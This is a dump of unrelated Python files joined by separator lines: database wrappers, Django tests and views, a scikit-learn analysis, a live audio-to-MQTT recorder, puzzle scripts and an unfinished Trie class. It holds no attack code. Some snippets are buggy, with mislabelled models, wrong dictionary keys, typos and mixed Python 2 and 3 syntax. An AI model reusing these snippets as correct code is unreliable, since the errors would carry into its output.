filepath = os.path.join(yamldir,file)
print(filepath)
ayamllist = loadyamlfile(filepath)
yamllist.extend(ayamllist)
return yamllist
|
import mysql.connector
from mysql.connector import Error
from logger import *
from traceback_info import *
import sys
ERR_1 = 1
ERR_2 = 2
ERR_FATAL = 3
class DB_Session_MySQL:
def __init__(self, username, password, db_id):
logger.debug( "DB_Session_MySQL::__init__()" )
self.username_ = username
self.password_ = password
self.db_id_ = db_id
self.connection_ = None
self.cursor_ = None
def connect(self):
logger.debug( "DB_Session_MySQL::connect()" )
try:
self.connection_ = mysql.connector.connect(host='localhost', database=self.db_id_, user=self.username_, password=self.password_)
self.cursor_ = self.connection_.cursor()
#self.cursor_.arraysize = 300
if self.connection_.is_connected():
logger.debug( "DB_Session_MySQL::connect() -> connected." )
return True
except Error as ex:
logger.error( "DB_Session_MySQL::connect() -> "
"MySQLException: %s" % (ex) )
return False
def disconnect(self):
try:
self.connection_.close()
except Error, ex:
logger.error( "DB_Session_MySQL::disconnect() -> "
"MySQLException: %s" % (ex) )
def rollback(self):
try:
self.connection_.rollback()
except:
return -1
return 0
def reconnect(self):
self.disconnect()
return self.connect()
def commit(self):
logger.debug( "DB_Session_MySQL::commit()" )
ret = 0
try:
self.connection_.commit()
except Error, ex:
logger.error( "DB_Session_MySQL::commit() -> "
"MySQLException: %s" % (ex) )
ret = -1
return ret
def execute( self, db_operation ):
logger.debug( "DB_Session_MySQL::execute()" )
reconnect_tries = 5
retry = True
ret = 0
while retry:
try:
logger.debug( "DB_Session_MySQL::execute() -> "
"executing %s query." % db_operation.tag())
ret = db_operation.execute( self.cursor_ )
retry = False
except Error, ex:
retry = self.handle_exception( ex, reconnect_tries)
reconnect_tries -= 1
ret = -1
except:
logger.error( "DB_Session_MySQL::execute() -> "
"unhandled exception executing %s." % db_operation.tag() )
logger.error( traceback_info() )
retry = False
ret = -1
return ret
def handle_exception(self, exception, retries):
logger.error( "DB_Session_MySQL::handle_exception() -> "
"MySQLException: %s %s" % (exception, self.cursor_.statement ) )
code = exception.args[0].code
if not self.must_reconnect( code ) and \
not self.must_rollback( code ):
logger.error( "DB_Session_MySQL::handle_exception() -> "
"Unable to handle exception." )
self.rollback()
return False
retries -= 1
if retries < 0:
logger.warning( "DB_Session_MySQL::handle_exception() -> "
"Maximum number if retrue exceeded." )
return False
if self.must_reconnect( code ):
logger.warning( "Attempting to reconnect current session.")
self.reconnect()
return True
if self.must_rollback( code ):
logger.warning( "Performing Rollback in current session.")
self.rollback()
return True
return False
def must_reconnect(self, code):
return code == ERR_1 or code == ERR_2
def must_rollback(self, code):
return code == ERR_FATAL
def driver_name(self):
return "DB_Session_MySQL"
|
#coding:utf-8
PIC_CODE_EXPIRES_SECONDS = 180
SMS_CODE_EXPIRES_SECONDS = 300
SESSION_EXPIRES_SECONDS = 86400
QINIU_URL_PREFIX = "http://olymmyzny.bkt.clouddn.com/"
QINIU_URL_SUFFIX = "?imageMogr2/auto-orient/thumbnail/x220/blur/1x0/quality/75|imageslim"
REDIS_AREA_INFO_EXPIRES_SECONDES = 86400
REDIS_HOUSE_INFO_EXPIRES_SECONDES = 86400
HOME_PAGE_MAX_HOUSES = 5
HOUSE_LIST_PAGE_CACHE_NUM = 2
HOME_PAGE_DATA_REDIS_EXPIRE_SECOND = 7200
HOUSE_LIST_PAGE_CAPACITY = 2 |
"""API v2 tests."""
from django.urls import reverse
from modoboa.admin import factories as admin_factories
from modoboa.admin import models as admin_models
from modoboa.dnstools import factories
from modoboa.lib.tests import ModoAPITestCase
class DNSViewSetTestCase(ModoAPITestCase):
@classmethod
def setUpTestData(cls): # NOQA:N802
"""Create test data."""
super().setUpTestData()
admin_factories.populate_database()
cls.spf_rec = factories.DNSRecordFactory(
type="spf", value="v=SPF1 mx -all", is_valid=True,
domain__name="test.com"
)
cls.dmarc_rec = factories.DNSRecordFactory(
type="dmarc", value="XXX", is_valid=False,
error="Not a DMARC record",
domain__name="test.com"
)
cls.dkim_rec = factories.DNSRecordFactory(
type="dkim", value="12345", is_valid=False,
error="Public key mismatchs",
domain__name="test.com"
)
cls.ac_rec = factories.DNSRecordFactory(
type="autoconfig", value="1.2.3.4", is_valid=True,
domain__name="test.com"
)
def test_dns_detail(self):
domain = admin_models.Domain.objects.get(name="test.com")
url = reverse("v2:dns-dns-detail", args=[domain.pk])
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.json()["dmarc_record"]["type"], "dmarc")
|
from common.run_method import RunMethod
import allure
@allure.step("在线诊断/条件获取接口")
def admission_condition_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/条件获取接口"
url = f"/service-question/admission/condition"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断列表")
def admission_list_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断列表"
url = f"/service-question/admission/list"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/校区、区域查询接口")
def admission_department_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/校区、区域查询接口"
url = f"/service-question/admission/department"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/待创建考试列表获取接口")
def admission_wait_create_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/待创建考试列表获取接口"
url = f"/service-question/admission/wait_create"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/区域查询接口")
def admission_department_query_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/区域查询接口"
url = f"/service-question/admission/department/query"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/试卷查询接口")
def admission_paper_list_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/试卷查询接口"
url = f"/service-question/admission/paper_list"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断新增接口")
def admission_add_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断新增接口"
url = f"/service-question/admission/add"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/编辑诊断接口")
def admission_update_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/编辑诊断接口"
url = f"/service-question/admission/update"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断详情接口")
def admission_info_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断详情接口"
url = f"/service-question/admission/info"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断操作日志列表接口")
def admission_logs_get(params=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断操作日志列表接口"
url = f"/service-question/admission/logs"
res = RunMethod.run_request("GET", url, params=params, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/考试记录列表")
def admission_list_result_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/考试记录列表"
url = f"/service-question/admission/list_result"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/考试试卷查看")
def admission_query_paper_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/考试试卷查看"
url = f"/service-question/admission/query_paper"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("在线诊断/诊断数据编辑")
def admission_update_admission_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "在线诊断/诊断数据编辑"
url = f"/service-question/admission/update_admission"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('myapp', '0003_blog_first_name'),
]
operations = [
migrations.AlterModelOptions(
name='category',
options={'verbose_name_plural': 'categories'},
),
migrations.AlterModelOptions(
name='entry',
options={'verbose_name_plural': 'entries'},
),
migrations.AlterField(
model_name='blog',
name='posted',
field=models.DateTimeField(auto_now_add=True, db_index=True),
preserve_default=True,
),
]
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
from sklearn import metrics
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.tree import plot_tree
from cleaning import *
desired_width=320
pd.set_option('display.width', desired_width)
np.set_printoptions(linewidth=desired_width)
pd.set_option('display.max_columns',100000)
def plot(response, cat_columns, num_columns):
"""
:return:
"""
for i in cat_columns:
# x, y = response, i
# (df
# .groupby(x)[y]
# .value_counts(normalize=True)
# .mul(100)
# .rename('percent')
# .reset_index()
# .pipe((sns.catplot, 'data'), x=x, y='percent', hue=y, kind='bar'))
sns.barplot(df_copy[i], df_copy[response])
plt.show()
for i in num_columns:
sns.barplot(df_copy[response], df_copy[i])
plt.show()
if __name__ == "__main__":
# Data inlezen
file = "ODI-2020.csv"
df = pd.read_csv(file, sep=';')
# Data opschonen
df_copy = clean(df)
# Target variabele kiezen
response = 'Program'
# Features kiezen en onderscheiden in categorisch/continue
independent_vars = df_copy.drop(response, axis=1)
num_columns = list(independent_vars.select_dtypes(include=['float64']).columns)
cat_columns = list(independent_vars.select_dtypes(include=['object']).columns)
## Eventueel plotten tegenover alle andere variabelen
sns.barplot(df_copy['Age'], df_copy['Stress'])
plt.title('Mean stress per age')
plt.show()
# plot(response, cat_columns, num_columns)
# Categorische data continue maken
dummy_data = pd.get_dummies(data=independent_vars, columns=cat_columns)
# Volledige data opsplitten in train en test
X_train, X_test, y_train, y_test = train_test_split(dummy_data, df_copy[response], test_size=0.3, random_state=15)
# Kiezen welke modellen je wil testen met welke hyperparameters
model_names = ["RandomForest_entropy", "RandomForest_gini"]
models = [DecisionTreeClassifier(criterion='entropy'), DecisionTreeClassifier(criterion='gini')]
cross_val_scores = {}
for x in range(len(model_names)):
cross_val_scores[model_names[x]] = cross_val_score(models[x], X_train, y_train, cv=5).mean()
print(cross_val_scores)
best_model = models[model_names.index(max(cross_val_scores, key=lambda x: cross_val_scores[x]))]
# 5-fold cross validation, beste model kiezen
# Beste model toepassen op volledige dataset
best_model.fit(X_train, y_train)
print(f"Ultimate accuracy for {max(cross_val_scores, key=lambda x: cross_val_scores[x])}: {best_model.score(X_test, y_test)}")
## Itereren over aantal features om te kijken welke meeste accuracy heeft
features = {}
feature_scores = []
columns = []
trees = []
for x in range(1,len(list(dummy_data.columns))):
kbest = SelectKBest(k=x)
fit = kbest.fit(dummy_data, df_copy[response])
X_new = kbest.fit_transform(dummy_data, df_copy[response])
X_train, X_test, y_train, y_test = train_test_split(X_new, df_copy[response], test_size=0.3, random_state=15)
best_model = models[model_names.index(max(cross_val_scores, key=lambda y: cross_val_scores[y]))]
best_model.fit(X_train, y_train)
trees.append(best_model)
print(f"Final accuracy for {max(cross_val_scores, key=lambda y: cross_val_scores[y])} with {x} feature(s): {best_model.score(X_test, y_test)}")
features[x] = best_model.score(X_test, y_test)
feature_scores.append(features[x])
columns.append(kbest.get_support(indices=True))
plt.plot(range(1,len(list(dummy_data.columns))), feature_scores)
plt.title(f"Accuracy for amount of features with {response} as target variable")
plt.xlabel("No of features")
plt.ylabel("Accuracy")
plt.show()
print(features)
print(max(features, key= lambda x: features[x]))
conf_interval = [max(feature_scores) - 1.96 * np.sqrt((1/y_test.size * max(feature_scores)) * (1 - max(feature_scores))),
max(feature_scores) + 1.96 * np.sqrt((1/y_test.size * max(feature_scores)) * (1 - max(feature_scores)))]
important_columns = dummy_data.iloc[:,columns[max(features, key=lambda x: features[x]) - 1]]
print(f"Most important features: {list(important_columns.columns)}")
print(f"Confidence interval: {conf_interval}")
plot_tree(trees[max(features, key= lambda x: features[x]) - 1], filled=True)
plt.show() |
import pyaudio
import wave
import uuid
import sounddevice as sd
import json
import numpy as np
#remove
import paho.mqtt.client as mqtt
class LiveRecorder:
def __init__(self, mqtt_client):
self.mqtt_client = mqtt_client
self.recording = False
self.p = pyaudio.PyAudio()
self.chunk = 256
# Record and send as numpy array
def record(self, topic):
stream = self.p.open(format=pyaudio.paInt16, # 16 bits per sample
channels=2,
rate=44100, # Record at 44100 samples per second
frames_per_buffer=self.chunk, # Record in chunks
input=True)
self.recording = True
# Record loop
while self.recording:
audiochunks = []
for i in range(10):
audiochunks.append(stream.read(self.chunk).hex())
data_dict = {"audio" : audiochunks}
# data_dict = {"audio" : stream.read(self.chunk).hex()}
self.mqtt_client.publish(topic, json.dumps(data_dict))
# Stop and close the stream
stream.stop_stream()
stream.close()
# Terminate the PortAudio interface
self.p.terminate()
# Stop recording
def stop(self):
self.recording = False
broker = "mqtt.item.ntnu.no"
port = 1883
client = mqtt.Client()
client.connect(broker, port)
recorder = LiveRecorder(client)
recorder.record('team13')
# s_recording = {'name': 'recording', 'do': 'record()', "stop": "stop()"}
#self.mqtt_client.publish(topic, audiofile)
|
def allZeros(occ):
for key,val in occ.items():
if(val > 0):
return False
return True
n=int(input())
radius = list(map(long,input().split(' ')))
occ = dict()
for i in range(n):
if radius[i] in occ:
occ[i] += 1
else:
occ[i] = 1
total = 0
while(not allZeros(occ)):
# decreament all occ by one
for key,cnt in occ.items():
occ[key] = cnt-1
total+=1
print(total)
|
#!/usr/bin/env python3
import argparse
import pathlib
import sys
import time
import dreamtests
try:
import dreamtests
except:
sys.path.append(pathlib.Path(__file__).parent.absolute())
import dreamtests
try:
import DREAM
except ImportError:
sys.path.append(str((pathlib.Path(__file__).parent / '..' / '..' / 'py').resolve().absolute()))
import DREAM
# Import test modules
from code_conductivity import code_conductivity
from code_runaway import code_runaway
from code_synchrotron import code_synchrotron
from DREAM_avalanche import DREAM_avalanche
from numericmag import numericmag
from trapping_conductivity import trapping_conductivity
from ts_adaptive import ts_adaptive
TESTS = [
'code_conductivity',
'code_runaway',
'code_synchrotron',
'DREAM_avalanche',
'numericmag',
'trapping_conductivity',
'ts_adaptive'
]
def print_help():
"""
Prints command help.
"""
global TESTS
print("Physics tests for DREAM\n")
print("Usage:")
print(" runtests.py Show this help message.")
print(" runtests.py all Run all tests.")
print(" runtests.py [FLAGS] [test1 [test2 [...]]]")
print(" Run the tests with names 'test1', 'test2' etc.\n")
print("Options:")
print(" --plot Plot result instead of comparing automatically.")
print(" --save Save test data to file.")
print(" --verbose Print additional test info. \n")
print("Available tests:")
for test in TESTS:
print(" {}".format(test))
def runtest(name, args):
"""
Run the named test.
"""
print("\x1B[1m:: {} \x1B[0m".format(name))
if name not in globals():
print("ERROR: Unrecognized test: '{}'".format(name))
return
return globals()[name].run(args)
def runall(args):
"""
Run all available tests.
"""
global TESTS
success = True
for test in TESTS:
s = runtest(test, args)
success = s and success
return success
def main(argv):
"""
Program entry point.
"""
parser = argparse.ArgumentParser(description='DREAM physics tests')
parser.add_argument('--plot', help="In tests where applicable, plot results instead of comparing automatically", action="store_true")
parser.add_argument('--save', help="In tests where applicable, save test data", action="store_true")
parser.add_argument('--verbose', help="In tests where applicable, print additional information", action="store_true")
parser.add_argument('tests', help="List of tests to run", type=str, nargs='*')
args = parser.parse_args()
arglist = {'plot': args.plot, 'save': args.save, 'verbose': args.verbose}
success = True
if len(args.tests) == 0:
print_help()
return 1
elif len(args.tests) == 1 and args.tests[0].lower() == 'all':
success = runall(arglist)
else:
for test in args.tests:
s = runtest(test, arglist)
success = s and success
# Return non-zero exit code on failure
if success: return 0
else: return 255
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
def solution(arr):
answer = arr[0]
for i in range(1, len(arr)):
for j in range(max(answer, arr[i]), answer * arr[i] + 1):
if j%answer == 0 and j%arr[i] == 0:
answer = j
break
return answer |
import unittest
import ctypes
from test.util import ClangTest
'''Test if pointers are correctly generated in structures for different target
archictecture.
'''
class Pointer(ClangTest):
#@unittest.skip('')
def test_x32_pointer(self):
flags = ['-target', 'i386-linux']
self.convert('''typedef int* A;''', flags)
self.assertEqual(ctypes.sizeof(self.namespace.A), 4)
def test_x64_pointer(self):
flags = ['-target', 'x86_64-linux']
self.convert('''typedef int* A;''', flags)
self.assertEqual(ctypes.sizeof(self.namespace.A), 8)
@unittest.expectedFailure
def test_member_pointer(self):
flags = ['-target', 'x86_64-linux', '-x', 'c++']
self.convert('''
struct Blob {
int i;
};
int Blob::*member_pointer;
''', flags)
self.assertEqual(self.namespace.struct_Blob.i.size, 4)
# FIXME
self.fail('member pointer')
#self.assertTrue(isinstance(self.namespace.member_pointer,POINTER_T) )
def test_same_arch_pointer(self):
self.convert('''
typedef char* PCHAR;
typedef void* PVOID;
''')
# print(self.text_output)
self.assertNotIn('POINTER_T', self.text_output)
# self.assertIn('POINTER_T', self.text_output)
if __name__ == "__main__":
unittest.main()
|
# api/views.py
from django.http import HttpResponse
from rest_framework import status
from rest_framework import viewsets
from rest_framework import permissions
from rest_framework.views import APIView
from rest_framework.response import Response
import book.barcode as bc
#import from Django Project
from .serializers import UserSerializer, BookSerializer, CreateBookSerializer
from .models import Book, User
class CreateBookAPI(APIView):
qureyset = Book.objects.all()
serializer_class = CreateBookSerializer
def post(self, request, format=None):
serializer = CreateBookSerializer(data=request.data, partial=True)
if serializer.is_valid():
isbn = request.data['isbn']
isbn_list = Book.objects.filter(isbn=isbn)
if not isbn_list:
if bc.parsing(request.data['isbn']):
book = bc.parsing(request.data['isbn'])
else:
return Response(serializer.data, status=status.HTTP_400_BAD_REQUEST)
serializer.save(isbn = request.data['isbn'],
title = book['title'],
image = book['image'],
price = book['price'],
pubdate = book['pubdate'],
publisher = book['publisher'],
author = book['author'],
r_count = 1,
count = 1)
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
book = Book.objects.get(isbn=isbn)
book.count = book.count + 1
book.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
print(serializer.errors)
return Response({'key': 'value'}, status=status.HTTP_200_OK)
|
#!/usr/bin/python3
from BWCommon import *
from BWControl import *
import wx
import sys
import getopt
import os
import ctypes
import wx.py as py
osp = 'linux'
if sys.platform.startswith("win"):
osp = 'win'
def main():
if not os.access('db', F_OK):
os.mkdir('db')
app = wx.App(False)
control = BWControl()
app.MainLoop()
if __name__ == '__main__':
main()
|
import re
from helper import *
def parseHostsFile(filename):
lines = open(filename).readlines()
category = 0 # 0=none/1=servers/2=clients
servers = []
clients = []
for line in lines:
# Ignore Comment lines
if line[0] == '#':
continue
line = line.strip()
if category == 0 and 'Servers:' in line:
category = 1
elif category == 1:
if 'Clients:' in line:
category = 2
else:
servers.append(line)
elif category == 2:
clients.append(line)
return (servers, clients)
# Class for parsing ethstats output
#
# Gives the mean and stdev of network utilization
class McperfParser:
def __init__(self, filename):
self.f = filename
self.lines = open(filename).readlines()
self.parse_ops_mcperf()
self.parse_latency_mcperf()
def parse_ops_mcperf(self):
pat_reqr = re.compile(r'Request rate: ([0-9\.]+) req/s')
pat_rspr = re.compile(r'Response rate: ([0-9\.]+) rsp/s')
pat_reqsize = re.compile(r'Request size \[B\]: avg ([0-9\.]+) min')
pat_rspsize = re.compile(r'Response size \[B\]: avg ([0-9\.]+) min')
pat_reqrsp = re.compile(r'Total: connections ([0-9\.]+) requests ([0-9\.]+) responses ([0-9\.]+) test-duration')
self.reqr = 0 # request rate
self.rspr = 0 # response rate
self.reqsize = 0 # average request size
self.rspsize = 0 # average response size
self.reqs = 0 # number of requests
self.rsps = 0 # number of responses
for l in self.lines:
# reqr
m = pat_reqr.search(l)
if m:
self.reqr = float(m.group(1))
# rspr
m = pat_rspr.search(l)
if m:
self.rspr = float(m.group(1))
# reqsize
m = pat_reqsize.search(l)
if m:
self.reqsize = float(m.group(1))
# rspsize
m = pat_rspsize.search(l)
if m:
self.rspsize = float(m.group(1))
# reqs, rsps
m = pat_reqrsp.search(l)
if m:
self.reqs = int(m.group(2))
self.rsps = int(m.group(3))
return (self.reqr, self.rspr,
self.reqsize, self.rspsize,
self.reqs, self.rsps)
def parse_latency_mcperf(self):
pat_mcperf = re.compile(r'([\d\.]+) (\d+)')
hist = dict()
skip = 0
for l in self.lines:
if skip == 0 and "Response time histogram [ms]" in l:
skip = 1
continue
# Parse
l = l.strip()
if l == ":":
continue
if "Response time [ms]: p25" in l:
break
m = pat_mcperf.search(l)
if m:
lo, num = m.group(1), m.group(2)
lo = float(lo)
hist[int(lo * 1e3)] = int(num)
self.hist = hist
return hist
def get_hist(self):
return self.hist
def get_reqr(self):
return self.reqr
def get_rspr(self):
return self.rspr
def get_reqsize(self):
return self.reqsize
def get_rspsize(self):
return self.rspsize
def get_reqs(self):
return self.reqs
def get_rsps(self):
return self.rsps
|
def main():
print("This program changes the names in a file to all capital letters")
infileName = input("What files are the names in? ")
outfileName = input("Place names in this file: ")
infileName = open(infileName, "r")
outfileName = open(outfileName,"w")
for line in infileName:
line = line.upper()
outfileName.write(line)
main()
|
def reverse(times):
c=a.readline().split()
d=[c[i] for i in range(len(c)-1,-1,-1)]
b.write("Case #{}: ".format(times+1))
for item in d:
b.write("{} ".format(item))
b.write("\n")
if __name__ == '__main__':
a=open('in.txt','r');
b=open('out.txt','w')
for time in xrange(0,int(a.readline())):
reverse(time)
a.close()
b.close() |
import re
import unittest
from katas.kyu_5.mod4_regex import Mod
class Mod4RegexTestCase(unittest.TestCase):
""" assertRegexpMatches doesn't seem to work properly for the tests
since Mod.mod4 is a compiled regex object already, not just a string.
To match the tests used on the Codewars kata, I used assertIsNone
and assertIsNotNone for the tests instead. """
def setUp(self):
self.invalid_tests = iter([
'[+05621]', '[-55622]', '[005623]', '[~24]', '[8.04]',
"No, [2014] isn't a multiple of 4..."]
)
self.valid_tests = iter([
'[+05620]', '[005624]', '[-05628]', '[005632]', '[555636]',
'[+05640]', '[005600]', 'the beginning [-0] the end', '~[4]',
'[32]', 'the beginning [0] ... [invalid] numb[3]rs ... the end',
'...may be [+002016] will be.'
])
def test_is_instance_1(self):
""" According to this stackoverflow, the proper way to check that
Mod.mod4 is a regex object is debatable. Here are two ways.
https://stackoverflow.com/questions/6226180/detect-re-regexp-object-in-python
"""
self.assertIsInstance(Mod.mod4, re._pattern_type)
# self.assertEqual(type(Mod.mod4), type(re.compile('')))
def test_is_none_1(self):
self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))
def test_is_none_2(self):
self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))
def test_is_none_3(self):
self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))
def test_is_none_4(self):
self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))
def test_is_none_5(self):
self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))
def test_is_none_6(self):
self.assertIsNone(Mod.mod4.match(next(self.invalid_tests)))
def test_is_not_none_1(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_2(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_3(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_4(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_5(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_6(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_7(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_8(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_9(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_10(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_11(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
def test_is_not_none_12(self):
self.assertIsNotNone(Mod.mod4.match(next(self.valid_tests)))
|
#create feature based on WN Domain dataset
#WordNet Domain dataset; two datafile, one for WN1.6, one for WN2.0
#Snow didn't mention which one they use, but I use WN1.6, since I mapped 2.1 to 1.6
#Snow created two features, but I only created the first one, since I was not sure about
#the second one.
#- "wn-domains-2.0-20050210" contains the mapping between Princeton WordNet 1.6 synsets and their corresponding domains. The format is as above.
df_wn21wn16=pd.read_csv('WN21mapWn16_full.csv')
df_wn_domain=pd.read_csv('/Users/gary/Documents/2020Fall/IntroNLP/project/FeatureSpace/wn-domains-3.2/wn-domains-2.0-20050210',
sep='\t',header=None)
df_wn_domain.columns=['offset-pos','domain']
#filter offers that not in domain data
#wn16_offsets_lst = list(set(df_wn21wn16['offset1_wn16'].to_list()+df_wn21wn16['offset2_wn16'].to_list()))
#domain_offsets_lst=list(set(df_wn_domain['offset-pos'].to_list()))
#overlap_offsets_lst = list(set(wn16_offsets_lst)&set(domain_offsets_lst))
for i in range(len(df_wn21wn16)):
offset1=df_wn21wn16.loc[df_wn21wn16.index[i],'offset1_wn16']
offset2=df_wn21wn16.loc[df_wn21wn16.index[i],'offset2_wn16']
dm1=df_wn_domain[df_wn_domain['offset-pos']==offset1]['domain'].to_list()
dm2=df_wn_domain[df_wn_domain['offset-pos']==offset2]['domain'].to_list()
if (len(dm1)==1 and len(dm2)==1):
if dm1[0]==dm2[0]:
feature=1
else:
feature=0
df_wn21wn16.loc[df_wn21wn16.index[i],'wn_domain_feature']=feature
df_wn21wn16.to_csv('WN21mapWn16_WN_Domain_feature.csv',index=False)
|
def main():
print ("Pig latin game.")
print("")
name = raw_input('Pleae enter your name: ')
print 'Hello,', name, '! Welcome to pig latin game.'
print("")
vowels = ('a', 'e', 'i', 'o', 'u','A', 'E', 'I', 'O', 'U' )
with_vowels = "yay"
without_vowels = "ay"
end = "Q", "q", "Quit", "quit"
word = ""
while (word != end):
word = raw_input('Please type what you would like to translate into pig latin or type Quit or q to quit and press enter: ')
if len(word) > 0 and word.isalpha() and word[0] in vowels and word != end:
wordl = word.lower()
new_word = wordl + with_vowels
print(new_word)
elif len(word) > 0 and word.isalpha() and word[0] not in vowels and word != end:
wordl = word.lower()
new_word = wordl + wordl[0] + without_vowels
new_word = new_word[1:]
print(new_word)
else:
print "please enter a valid word/sentence"
print("Thanks for playing pig latin! Hopefully will see you again")
main()
|
class Node:
def __init__(self, key):
self.key = key
self.child = dict()
self.count_leaf = 0 # 파생 단어 개수(leaf 노드 개수)
class Trie:
def __init__(self):
self.head = Node(None)
self.word_count = 0
def insert(self, word):
curr = self.head
for c in word:
if c not in curr.child:
curr.child[c] = Node(c)
curr = curr.child[c]
curr.count_leaf += 1
curr.child['*'] = True
self.word_count += 1
def search(self, word):
curr = self.head
marth_fail = False
for c in word:
if c != '?':
if c not in curr.child:
match_fail = True
break # 검색 실패하면 탈출
curr = curr.child[c]
else:
